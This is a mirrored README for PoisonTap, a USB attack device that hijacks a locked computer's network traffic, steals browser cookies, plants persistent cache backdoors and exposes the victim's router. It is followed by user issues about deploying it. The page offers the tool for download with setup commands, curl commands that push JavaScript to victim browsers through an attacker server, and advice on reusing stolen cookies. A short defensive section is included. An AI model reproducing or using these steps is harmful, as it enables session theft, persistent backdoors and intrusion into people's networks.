Giter Club home page Giter Club logo

poisontap's Introduction

PoisonTap - siphons cookies, exposes internal router & installs web backdoor on locked computers

Created by @SamyKamkar || https://samy.pl

When PoisonTap (Raspberry Pi Zero & Node.js) is plugged into a locked/password protected computer, it:

  • emulates an Ethernet device over USB (or Thunderbolt)
  • hijacks all Internet traffic from the machine (despite being a low priority/unknown network interface)
  • siphons and stores HTTP cookies and sessions from the web browser for the Alexa top 1,000,000 websites
  • exposes the internal router to the attacker, making it accessible remotely via outbound WebSocket and DNS rebinding (thanks Matt Austin for rebinding idea!)
  • installs a persistent web-based backdoor in HTTP cache for hundreds of thousands of domains and common Javascript CDN URLs, all with access to the user's cookies via cache poisoning
  • allows attacker to remotely force the user to make HTTP requests and proxy back responses (GET & POSTs) with the user's cookies on any backdoored domain
  • does not require the machine to be unlocked
  • backdoors and remote access persist even after device is removed and attacker sashays away

PoisonTap

(incredible HTML5 canvas animation by Ara)

PoisonTap evades the following security mechanisms:


Demo

PoisonTap is built for the $5 Raspberry Pi Zero without any additional components other than a micro-USB cable & microSD card, or can work on any Raspberry Pi (1/2/3) with an Ethernet-to-USB/Thunderbolt dongle, or can work on other devices that can emulate USB gadgets such as USB Armory and LAN Turtle.

Live demonstration and more details available in the video: MagSpoof

Point of Contact: @SamyKamkar // https://samy.pl

Released: November 16, 2016

Source code and download: https://github.com/samyk/poisontap


How PoisonTap Works

PoisonTap produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB/Thunderbolt, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors.

Network Hijacking

In a nutshell, PoisonTap performs the following:

Network Hijacking

  • Attacker plugs PoisonTap (such as weaponized Raspberry Pi Zero) into a locked computer (even if computer is password protected)
  • PoisonTap emulates an Ethernet device (eg, Ethernet over USB/Thunderbolt) -- by default, Windows, OS X and Linux recognize an ethernet device, automatically loading it as a low-priority network device and performing a DHCP request across it, even when the machine is locked or password protected
  • PoisonTap responds to the DHCP request and provides the machine with an IP address, however the DHCP response is crafted to tell the machine that the entire IPv4 space (0.0.0.0 - 255.255.255.255) is part of the PoisonTap's local network, rather than a small subnet (eg 192.168.0.0 - 192.168.0.255)
    • Normally it would be irrelevant if a secondary network device connects to a machine as it will be given lower priority than the existing (trusted) network device and won't supersede the gateway for Internet traffic, but...
    • Any routing table / gateway priority / network interface service order security is bypassed due to the priority of "LAN traffic" over "Internet traffic"
    • PoisonTap exploits this network access, even as a low priority network device, because the subnet of a low priority network device is given higher priority than the gateway (default route) of the highest priority network device
    • This means if traffic is destined to 1.2.3.4, while normally this traffic would hit the default route/gateway of the primary (non-PoisonTap) network device, PoisonTap actually gets the traffic because the PoisonTap "local" network/subnet supposedly contains 1.2.3.4, and every other IP address in existence ;)
    • Because of this, all Internet traffic goes over PoisonTap, even though the machine is connected to another network device with higher priority and proper gateway (the true wifi, ethernet, etc.)

Cookie Siphoning

Cookie Siphoning

  • As long as a web browser is running the background, it is likely one of the open pages will perform an HTTP request in the background (for example to load a new ad, send data to an analytics platform, or simply continue to track your web movements) via AJAX or dynamic script/iframe tags
    • You can see this for yourself, go into your devtools/inspector (typically Cmd+Shift+I or Ctrl+Shift+I), go to a heavily visited website, click on the Network tab, and watch as remote resources continue to be accessed even as you take no action on the page
  • Upon this HTTP request, because all traffic exits onto the PoisonTap device, PoisonTap DNS spoofs on the fly to return its own address, causing the HTTP request to hit the PoisonTap web server (Node.js)
    • If the DNS server is pointing to an internal IP (LAN) that PoisonTap cannot get privilege for, the attack continues to function as the internal DNS server will produce public IP addresses for the various domains attacked, and it is the public IP addresses that PoisonTap has already hijacked
    • Once the internal DNS server responds, the web browser hits the public IP, ultimately hitting the PoisonTap web server (Node.js) in either scenario
  • When the Node web server receives the request, PoisonTap responds with a response that can be interpreted as HTML or as Javascript, both of which execute properly (many websites will load HTML or JS in background requests)
  • The HTML/JS-agnostic page then produces many hidden iframes, each iframe across a different Alexa-top-1-million domain
    • Any "X-Frame-Options" security on the domain is bypassed as PoisonTap is now the HTTP server and chooses which headers to send to the client
    • As every iframe HTTP request to a site is made (eg, http://nfl.com/PoisonTap), the HTTP cookies are sent from the browser to the "public IP" hijacked by PoisonTap, which swiftly logs the cookies/authentication information, logging tens of thousands of the user's cookies into PoisonTap
    • Any "HttpOnly" cookie security is bypassed and those cookies are captured as no Javascript is executed on the domain itself, but rather only used to load the iframe in the first place
    • Any Cross-Origin Resource Sharing or Same-Origin Policy security is bypassed as the domain being accessed appears legitimate to the browser
    • Because we're capturing cookies rather than credentials, any 2FA/MFA implemented on the site is bypassed when the attacker uses the cookie to login. This is because we're not actually performing the login function but rather continuing an already logged-in session which does not trigger two-factor authentication
    • If a server is using HTTPS, but the cookies do not explicitly set the Secure cookie flag, the HTTPS protection is bypassed and the cookie is sent to PoisonTap

Internal Router Backdoor

Remotely Accessible Web-Based Backdoors

  • While PoisonTap was producing thousands of iframes, forcing the browser to load each one, these iframes are not just blank pages at all, but rather HTML+Javascript backdoors that are cached indefinitely
  • Because PoisonTap force-caches these backdoors on each domain, the backdoor is tied to that domain, enabling the attacker to use the domain's cookies and launch same-origin requests in the future, even if the user is currently not logged in
    • For example, when the http://nfl.com/PoisonTap iframe is loaded, PoisonTap accepts the diverted Internet traffic, responds to the HTTP request via the Node web server
    • Additional HTTP headers are added to cache the page indefinitely
  • The actual response of the page is a combination of HTML and Javascript that produces a persistent WebSocket out to the attacker's web server (over the Internet, not on the PoisonTap device)
    • The WebSocket remains open allowing the attacker to, at any point in the future, connect back to the backdoored machine and perform requests across any origin that has the backdoor implemented (the Alexa top 1,000,000 sites -- see below)
    • If the backdoor is opened on one site (e.g., nfl.com), but the user wishes to attack a different domain (e.g., pinterest.com), the attacker can load an iframe on nfl.com to the pinterest.com backdoor (http://pinterest.com/PoisonTap)
    • Again, any "X-Frame-Options", Cross-Origin Resource Sharing, and Same-Origin Policy security on the domain is entirely bypassed as the request will hit the cache that PoisonTap left rather than the true domain

Raspberry Pi Zero

Internal Router Backdoor & Remote Access

  • The one network PoisonTap is not able to hijack is the actual LAN subnet of the true network interface (for example, if the user's wifi subnet is 192.168.0.x, this network is unaffected), but...
  • PoisonTap force-caches a backdoor on a special host, specifically the target router's IP prepended to ".ip.samy.pl", e.g. 192.168.0.1.ip.samy.pl, essentially producing a persistent DNS rebinding attack
    • When using PoisonTap as the DNS server (victim using public DNS server), PoisonTap responds with the specialized PoisonTap IP temporarily (1.0.0.1), meaning any requests at that moment will hit the PoisonTap web server
    • If instead the DNS server is set to the internal network (e.g., 192.168.0.x), an additional specially crafted request is made to 1.0.0.1**.pin.**ip.samy.pl which tells my specialized DNS server (on the public Internet) to temporarily respond to any [ip.address].ip.samy.pl address with the "pinned" address (1.0.0.1) for several seconds
    • PoisonTap then quickly sets a backdoor on http://192.168.0.1.ip.samy.pl/PoisonTap, which for the moment points to the PoisonTap device at 1.0.0.1, allowing the backdoor to be accessed and cached from the PoisonTap device
  • DNS pinning and DNS rebinding security are bypassed due to exhausting the DNS pinning table, due to the hundreds of thousands of requests just previously made, and no rebinding needs to occur in the future, making this attack persistent over long periods of time (thanks to Matt Austin for sharing this attack with me!)
  • Now that a backdoor is force-cached to http://192.168.0.1.ip.samy.pl/PoisonTap, any future requests to the 192.168.0.1.ip.samy.pl will hit the unpinned IP address, causing 192.168.0.1 to resolve instead, pointing directly to the router
  • This means if loading the 192.168.0.1.ip.samy.pl/PoisonTap host in an iframe remotely over the backdoor, you can now perform AJAX GET/POSTs to any other page on the internal router, entirely remotely, thus allowing remote access to the internal router
    • This can lead to other attacks on the router which the attacker may have never had access to in the first place, such as default admin credentials on the router being used to overwrite DNS servers, or other authentication vulnerabilities being exposed

DNS Rebinding

Recap of the DNS server:

  • [ip.addy].ip.samy.pl normally responds with [ip.addy]
  • 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
  • [ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy]
    • 1.0.0.1.pin.ip.samy.pl -> 1.0.0.1
    • 192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL)
    • (after ~5 seconds)
    • 192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)

Additional Remotely Accessible Web-Based Backdoors

  • Additionally, PoisonTap replaces thousands of common, CDN-based Javascript files, e.g. Google and jQuery CDNs, with the correct code plus a backdoor that gives the attacker access to any domain loading the infected CDN-based Javascript file
  • Because a backdoor is left on each domain, this allows the attacker to remotely force the backdoored browser to perform same-origin requests (AJAX GET/POSTs) on virtually any major domain, even if the victim does not currently have any open windows to that domain
  • The backdoor will now live on any additional site that also uses one of these infected, HTTP-based, CDN Javascript frameworks when the victim visits the site

PoisonTap

Securing Against PoisonTap

Server-Side Security

If you are running a web server, securing against PoisonTap is simple:

  • Use HTTPS exclusively, at the very least for authentication and authenticated content
    • Honestly, you should use HTTPS exclusively and always redirect HTTP content to HTTPS, preventing a user being tricked into providing credentials or other PII over HTTP
  • Ensure Secure flag is enabled on cookies, preventing HTTPS cookies from leaking over HTTP
  • When using remote Javascript resources, use the Subresource Integrity script tag attribute
  • Use HSTS to prevent HTTPS downgrade attacks

Desktop Security

  • Adding cement to your USB and Thunderbolt ports can be effective
  • Closing your browser every time you walk away from your machine can work, but is entirely impractical
  • Disabling USB/Thunderbolt ports is also effective, though also impractical
  • Locking your computer has no effect as the network and USB stacks operate while the machine is locked, however, going into an encrypted sleep mode where a key is required to decrypt memory (e.g., FileVault2 + deep sleep) solves most of the issues as your browser will no longer make requests, even if woken up

Download

Source code: https://github.com/samyk/poisontap


Installation / File Breakdown

Note: If you find the device is NOT acting as an Ethernet controller automatically (older versions of Windows, for example), you can change the VID and PID in pi_startup.sh

# Instructions adjusted from https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
sudo bash

# If Raspbian BEFORE 2016-05-10, then run next line:
BRANCH=next rpi-update

echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo "dtoverlay=dwc2" >> /boot/config.txt
echo -e "dwc2\ng_ether" >> /etc/modules
sudo sed --in-place "/exit 0/d" /etc/rc.local
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

Place dhcpd.conf in /etc/dhcp/dhcpd.conf and the rest of the files in /home/pi/poisontap, then reboot to ensure everything is working.

There are a number of files in the repo, which are used on different sides. The list:

  • backdoor.html - Whenever a http://hostname/PoisonTap URL is hit to exfiltrate cookies, this file is what is returned as the force-cached content. It contains a backdoor that produces an outbound websocket to samy.pl:1337 (adjustable to any host/port) that remains opens waiting for commands from the server. This means when you load an iframe on a site, such as http://hostname/PoisonTap, this is the content that gets populated (even after PoisonTap is removed from the machine).
  • backend_server.js - This is the Node.js server that you run on your Internet-accessible server. It is what the backdoor.html connects to (eg, samy.pl:1337). This is the same server you connect to send commands to your PoisonTapped minion machines, eg
# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'
  • pi_poisontap.js - This runs via Node.js on the Raspberry Pi Zero and is the HTTP server responsible for handling any HTTP requests intercepted by PoisonTap, storing siphoned cookies, and injecting the cached backdoors.
  • pi_startup.sh - This runs upon startup on the Raspberry Pi Zero in order to set the device up to emulate an Ethernet-over-USB gadget, set up our evil DHCP server, allow traffic rerouting, DNS spoofing, and to launch pi_poisontap.js above.
  • target_backdoor.js - This file is prepended to any CDN-related Javascript files, thus backdooring them, e.g. Google CDN's jQuery URL.
  • target_injected_xhtmljs.html - This is the code that gets injected into unintentional/background HTTP/AJAX requests on the victim's machine and spawns the entire attack. It is constructed in a way that it can be interpreted as HTML or as Javascript and still execute the same code. Additionally, the amazing HTML5 canvas is by the incredible Ara oen CodePen and was too amazing not to include. This is the graphical craziness that appears when the page gets taken over by PoisonTap.
  • poisontap.cookies.log - This file is generated once the user's machine starts sending HTTP requests to PoisonTap and logs the cookie from the browser along with the associated URL/domain it belongs to.

Frequently Asked Questions

  • Q: How do you add additional domains to be backdoored?
  • A: The list of domains to be backdoored is set in target_injected_xhtmljs.html by the getDoms() function. This itself is populated by the alexa1m.sh script in the root of the repo. If you wish to add additional domains to this list, you can simply amend the return call in getDoms().
  • Q: How do you use the captured cookies?
  • A: You can use the Document.cookie API directly from the JavaScript console in your browser to set cookies. This StackOverflow post also has a few Chrome-specific suggestions, for example the Cookie Inspector Chrome extension.
  • Q: How do I clean Poisontap from a machine?
  • A: You should clear the local OS DNS cache, as well as any browser caches. You may also need to invalidate any logged-in sessions at the time, which may have leaked cookies. Ensure that these invalidate existing cookies, rather than simply logging you out. (If you want to safetly work with a PoisonTap device on your current machine, make sure to exit any browser, then you should be able to safetly connect it to your machine).

Contact

Point of Contact: @SamyKamkar

You can see more of my projects or contact me at https://samy.pl.

poisontap's People

Contributors

ddgva avatar hxxxxxs avatar jr-k avatar mikecoles avatar natebrady23 avatar plazmaz avatar samyk avatar victorhooi avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

poisontap's Issues

Mac: Works Once Only ?

I got it to work on my macbook air
then
I removed the RNDIS/Ethernet Gadget thing that gets installed under the Network manager in osx
I deleted the cache from safari to remove the backdoors.

But when I replug in my raspberry pi zero, its doesnt install the RNDIS/Ethernet Gadget again nor the backdoors?

What i'm wondering is: is there some type of file that is created that tells the pi the machines that have been compromised already, so it doesnt re-do its thing?

Note- it installs on others computers fine, but not the same one. hmmmmm

Installation Smooth & Great But... Not Working...

I run through the installation following all (i hope) aspects including the config.txt and cmdline.xt By booting up and connecting to my Mac - the eth card is there but any site/browser and program using inet connection just doesn't open. As soon as i disconnect everything is back to normal. Sorry for the silly question... but does anybody knows what i did wrong? Please get back if you need more info. Bruno
1
i2

HTTPS Cookies and Popping a Shell

How do you browse using the stolen session cookies?

What can you really do with the browser backdoor this provides? All I can imagine is maybe use a BEEF inject.js but can you gain shell access?

WPAD?

Have you tried to force feed a windows 'victim' a WPAD response to get some of that sweet https action?

Backdoor Cleanup?

Is there any automated method to remove the persistent backdoors from a machine, either remotely or via plugging the device into the target machine(s) again? More of a feature request than an issue, but it would be nice to have.

Installation/setup

Hi,

Any link for guiding on how to install/setup the PoisonTap.

Thanking you in anticipation.

Regards,

Riz

HELP: Poisontap for beginners

hi guys!

I work in the computer department of a public school and we want to educate the community about computer security. We want to introduce them to Poisontap.

We buy a raspberry pi 3 in order to program the poisontap. But it seems to be more complicated than expected. Is there a detail procedure from the beginning? Or are there existing files to download on the raspberry that would make the task easier?

Iam new in programming. Thanks for helping the community.

Thank you guys!!

Poisontap on Teensy 3.6 w/ SD card

Allo sir. Would you consider this feasible? It has native eth support, can support spi flash, and can carry a micro SD. There is also whispers of this being able to interface sdram via DMA. I haven't personally confirmed that but will running tests soon. Thanks for your time on this project. Great work so far.

Source code for ip.samy.pl?

The DNS rebinding feature of poisontap depends on using your custom DNS server on ip.samy.pl. Given that the second stage of the DNS rebinding attack uses the domain to inject an iframe, I think users would feel a lot better knowing we could use our own DNS instead of putting all of our eggs in your basket.
Besides, the pinning feature of the DNS seems quite unique and probably merits being a project of it's own!

Running backend_server.js

Hello,

I have set up the raspberry pi 0 and successfully tested it on windows 10. The only issue I am running into is the server itself. I am using Ubuntu 14.04 as the server. I know that backend_server.js has to be on the server but I do not know where specifically to place it. Once it is in its appropriate location do you simply run "node backend_server.js" followed by the curl commands?
Should running node backend_server.js give me a return? Currently it is not.
When I run the curl 'http://192.XXX.XXX.XXX:1337/exec?alert("muahahahaha")' I get a connection refused.

Any help would be appreciated.
Thank you!

Mobile device support

Could this be made to work on locked Android phones? I'm assuming they would need otg host enabled by the user first right? (I don't personally own an Android device but I may borrow one once I get my pi zero.) It would be interesting to see if common android background requests could be abused and how they are evaluated. I doubt there is anything happening in the background which renders in a web view except maybe those network proxy authentication pop-ups some hotels use. (Sorry don't know the term.) Are there common third party/vendor launchers which use a web view we could inject into? Are there other features accessible from the lock screen like Google assistant we could trick into loading a web resource? if any the browser prefetch pages you ask assistant to load before unlocking?

What about a Bluetooth network device that asks to pair with a target phone? Obviously this would require some user interaction to pair but in the right circumstance it could be convincing. (Spoof car name when the target enters a car for example.)

As far as I know the only networking that happens on iOS over lightning is hosted by the phone for tethering which might prevent this attack.

Windows mitigation

Block USB ethernet gadgets (tested with pi zero, but I believe this would block all usb Ethernet gadgets)
go into mmc.exe and add Group Policy Object Editor plugin (Local Computer) and navigate to Computer Configuration|Administrative Templates|System|Device Installation|Device Installation Restrictions
block1
Select "Enabled" radio button, click checkbox for "also apply to matching devices that are already installed"
block2
then click "Show" and enter in
USB\VID_0525&PID_A4A2
and click "OK" and "OK" again, you can close the local policy.
block3
in a few seconds you should see the device go away and get a message about it being blocked.
block4

pi_startup.sh not launching at boot - or is it?

Hi,

I have tried to get this to work upon boot but not having any luck... I have followed these instructions:

Setup startup script: sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh. Also we need to run pi_startup.sh at boot time: sudo nano /etc/rc.local and add /etc/init.d/pi_startup.sh & JUST BEFORE exit 0.

but if I reboot and check if any of the processes that pi_startup.sh launches (ps aux | grep SCREEN) I can see dnsspoof running but no nodejs pi_poisontap.js...

How can I check if pi_startup.sh is definitely executing on boot via rc.local?
And why might node not be running if the startup script is running?

Thanks..

SyntaxError when running backend_server.js in Node

Hi,

I'm getting a bunch of SyntaxErrors thrown by NodeJS when trying to run the backend_server.js on my server. I've tried the repo I pulled yesterday, and then re-cloned the latest version via Git just to make double-sure..

|- /home/jono jono@ubuntu:~$ git clone https://github.com/samyk/poisontap.git Cloning into 'poisontap'... remote: Counting objects: 370, done. remote: Compressing objects: 100% (83/83), done. remote: Total 370 (delta 295), reused 360 (delta 285), pack-reused 0 Receiving objects: 100% (370/370), 4.34 MiB | 2.91 MiB/s, done. Resolving deltas: 100% (295/295), done. Checking connectivity... done.

Trying to launch throws this error:

nodejs backend_server.js

/home/jono/poisontap/backend_server.js:9 var server = http.createServer((request, response) => { ^

SyntaxError: Unexpected token > at Module._compile (module.js:439:25) at Object.Module._extensions..js (module.js:474:10) at Module.load (module.js:356:32) at Function.Module._load (module.js:312:12) at Function.Module.runMain (module.js:497:10) at startup (node.js:119:16) at node.js:902:3

It's not displaying particularly well in this Markdown codeblock but I think you get the gist. It's not liking the =>.

Anyone else having this issue? Admittedly node isn't something I've used in anger so this could be a fairly daft question...

Route All Traffic?

Has anyone came up with away to allow all traffic through poison tap? I would like to allow all traffic to flow through the zero so I can pcap it but I can not figure out how to make iptables do it.

Playing around with some of the iptables rules I noticed you can do things like and build out a decent list:
/sbin/iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 22 -j REDIRECT --to-port 22

but I have not figured out a way to just allow all traffic to route through pi. Anyone have any ideas?

The back door does not work

I have setup poisontap in my nethunter nexus6p,when i plug into my win8.1 usb port,all network traffic is goto nexus6p,and phone screen can see my browser cookie.(eg youku.com)
i have modify the backdoor.html:
var socket = new WebSocket('ws://YOURDOMAIN:1337');
to
var socket = new WebSocket('ws://my IP:1337');

and modify the target_backdoor.js:
new Image().src='http://YOURDOMAIN/log.php?log='+document.cookies;
to
new Image().src='http://my IP/log.php?log='+document.cookies;
my online server is running backend_server.js listening port 1337 succesed and log.php is work
but when i use command http://my IP:1337/exec?alert("muahahahaha") (ps."my IP" is my server ip)
My browser nothing happened,why?
and When I visit the list of URLs in target_injected_xhtmljs.html
browser will jump to your video in the interface,What does it do?

How to trigger backdoor? thx!

backdoor test succeed,But there's still a question

my device is nethunter nexus6p
I plug posiontap into my win8.1 and it have open browser.
the browser open the sites like youku.com,msn.com
then nexus6p appear cookies of site
when my browser open http://youku.com/PosionTap. It was empty,and I send
curl 'http://my ip:1337/exec?alert("muahahahaha")'
the browser pop "muahahahaha" succeed
so,when i want to use the backdoor,did I must insert a frame into the phishing page then let the victim visit it?
Can I use other methods to actively trigger the backdoor?
please help me,thx!

cookies cookies cookies

I get the animation and the graphs (network tab on dev tools chrome) when The pi zero (PT) is plugged in (win10 laptop)
When i check the poisontap folder afterwards on the pi zero, I have a "poisontap.cookies.log" but all it contains is a date and hour and
"poisontap is listening"

Where are the cookies?
Should i do something on the laptop?

On the server side (a raspberry pi 3), i'm having the problem that no websocket is being openend, but i thought, there would be cookies locally on the pi zero without the server side working?

PoisonTap is not working

Hi!

I bought a Raspberry Pi Zero (my first pi) to try this and I installed Raspbian on it. I had some problems to configure the updates because I only had one USB input, but I solved it with sleeps and yes' pipes. Then I created the /home/pi/poisontap/ dir and I copied there all the code of this repo. I did the instructions of installation with the echos and the updates and I finally moved dhcpd.conf to /etc/dhcp/dhcpd.conf. When I plug the Pi on my computer (I use Ubuntu) it detects the new Wired Connection with the name (Linux 4.4.34+ with 20980000.usb RNDIS/Ethernet Gadget) but it's all i can see. I have the browser (i use Firefox) opened and I try to open and close a lot of http or https connections, some of them with password and on the top of the Alexa's list (Google, Amazon...). But nothing happens.

It's required the backdoor to get the cookies list? I don't like the backdoor because I think it is easily traceable. I tried it too on Windows 10 but i didn't saw the new wired connection, so i don't know what happens there, but i read about a lot of people with problems with windows 10. The js is been executed because for each try there is a new "==== (Date) [1480720557967] ==== PoisonTap is listening".

Any idea? I don't know anything about Pi Zero, but I think this isn't the problem.

Thank you and goodbye.

Clean Target

hi,

is there any way to clean the target and kill the backdoor?

DHCP configuration

Hello,

Thanks for sharing this !
I've a question, what is your dhcp configuration please ? (dhcpd.conf content)

Thanks !

hey,I have some questions about the poisontap,Please help me,very very thanks...

@samyk @jreziga
I'm on raspberry pi 3B, connected to PC(win 10), and use a usb-cable to connect PC. It is right?
Q1:
I'm looking this guid part2
And I tried to run pi_startup.sh, launch throws this error:
root@raspberrypi:/home/pi/poisontap# chmod +x pi_
pi_poisontap.js pi_startup.sh
root@raspberrypi:/home/pi/poisontap# chmod +x pi_startup.sh
root@raspberrypi:/home/pi/poisontap# ./pi_startup.sh
./pi_startup.sh: 8: cd: can't cd to /sys/kernel/config/usb_gadget/
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: cannot access /sys/class/udc: No such file or directory
Cannot find device "usb0"
Failed to bring up usb0.
usb0: ERROR while getting interface flags: No such device
SIOCADDRT: No such device
[....] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.serviceJob for isc-dhcp-server.service failed. See 'systemctl status isc-dhcp-server.service' and 'journalctl -xn' for details.
failed!

Q2:
root@raspberrypi:/home/pi/poisontap# nodejs backend_server.js

/home/pi/poisontap/backend_server.js:9
var server = http.createServer((request, response) => {
^
SyntaxError: Unexpected token >
at Module._compile (module.js:439:25)
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:906:3

root@raspberrypi:/home/pi/poisontap# node backend_server.js
events.js:160
throw er; // Unhandled 'error' event
^

Error: listen EADDRINUSE :::1337
at Object.exports._errnoException (util.js:1026:11)
at exports._exceptionWithHostPort (util.js:1049:20)
at Server._listen2 (net.js:1257:14)
at listen (net.js:1293:10)
at Server.listen (net.js:1389:5)
at Object. (/home/pi/poisontap/backend_server.js:50:8)
at Module._compile (module.js:570:32)
at Object.Module._extensions..js (module.js:579:10)
at Module.load (module.js:487:32)
at tryModuleLoad (module.js:446:12)
root@raspberrypi:/home/pi/poisontap# nodejs backend_server.js

What should I do???

Windows support

Does poisontap really work with Windows 7 or 19?
AFAIK, CDC ECM is not supported so Windows should never see the device as an ethernet device.

Installation - problems to get started

Hi, I installed everything so far and getting the following errors:

/home/pi/poisontap/pi_startup.sh: 8: cd: can't cd to /sys/kernel/config/usb_gadget/
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: cannot access /sys/class/udc: No such file or directory
Ignoring unknown interface usb0=usb0.
usb0: ERROR while getting interface flags: No such device
SIOCADDRT: No such device
[....] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.serviceJob for isc-dhcp-server.service failed. See 'systemctl status isc-dhcp-server.service' and 'journalctl -xn' for details.
failed!
net.ipv4.ip_forward = 1

systemctl status isc-dhcp-server.service:

isc-dhcp-server.service - LSB: DHCP server
Loaded: loaded (/etc/init.d/isc-dhcp-server)
Active: failed (Result: exit-code) since Fri 2016-11-18 16:21:50 UTC; 22s ago
Process: 3556 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=1/FAILURE)

Any idea what could be wrong?

Backend Server not pushing commands to victim?

So everything is working on the pi zero (I think, I get the same stuff in the network as Samy does). But the problem comes to the server.

First I want to ask: when the pi makes the outbound connection to the server, should the server say anything? All I see is the "listening on port 1337" but nothing when the pi is plugged in.

I am running the backend_server.js in a screen (am I supposed to run it in screen? Or should I just run it in the normal shell?), and I can send commands like the curl 'http://domain.com/1337/exec?alert("message")'. It says sent in the shell, then when I go to the screen it says request received. But there is no evidence of anything being sent to the victim machine. Nothing on console, network, logs, anything. Is there something wrong with my server? (I am using AWS ubuntu server and have 1337 port forwarded).

Information that might be useful to help me:
When looking at the console, all of the links that are domain.com/Poisontap get error 404, but I assume this is fine because that page doesn't actually exist. The network is fine, with a 404 here and there. My network graph is similar to the one Samy shows in his video, but I have a lot more gray area.

Any help would be super appreciated, Thanks!!!

Can't get started

Hi. I try run poison tap on my RPiZero. But still this same problem.

Any solution ?
When I use sudo ./pi_startup.sh I got error

ls: write error: Device or resource busy
Ignoring unknown interface usb0=usb0.
./pi_startup.sh: 42: ./pi_startup.sh: /etc/init.d/isc-dhcp-server: not found
net.ipv4.ip_forward = 1

But if I use ./pi_startup.sh

./pi_startup.sh: 11: ./pi_startup.sh: cannot create idVendor: Permission denied
./pi_startup.sh: 12: ./pi_startup.sh: cannot create idProduct: Permission denied
./pi_startup.sh: 13: ./pi_startup.sh: cannot create bcdDevice: Permission denied
./pi_startup.sh: 14: ./pi_startup.sh: cannot create bcdUSB: Permission denied
./pi_startup.sh: 16: ./pi_startup.sh: cannot create strings/0x409/serialnumber: Permission denied
./pi_startup.sh: 17: ./pi_startup.sh: cannot create strings/0x409/manufacturer: Permission denied
./pi_startup.sh: 18: ./pi_startup.sh: cannot create strings/0x409/product: Permission denied
./pi_startup.sh: 20: ./pi_startup.sh: cannot create configs/c.1/strings/0x409/configuration: Permission denied
./pi_startup.sh: 21: ./pi_startup.sh: cannot create configs/c.1/MaxPower: Permission denied
ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
./pi_startup.sh: 33: ./pi_startup.sh: cannot create functions/ecm.usb0/host_addr: Permission denied
./pi_startup.sh: 34: ./pi_startup.sh: cannot create functions/ecm.usb0/dev_addr: Permission denied
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
./pi_startup.sh: 36: ./pi_startup.sh: cannot create UDC: Permission denied
ifup: failed to open lockfile /run/network/.ifstate.lock: Permission denied
SIOCSIFFLAGS: Operation not permitted
SIOCADDRT: Operation not permitted
./pi_startup.sh: 42: ./pi_startup.sh: /etc/init.d/isc-dhcp-server: not found
sysctl: permission denied on key 'net.ipv4.ip_forward'
iptables v1.4.21: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.

Having trouble getting things working on USB Armory

So first up, I did host the backend on Heroku, so that might be part of the issue, but I'm reasonably confident I set up all the references to the backend correctly and the backend at least does appear to receive the request (though it hangs indefinitely).

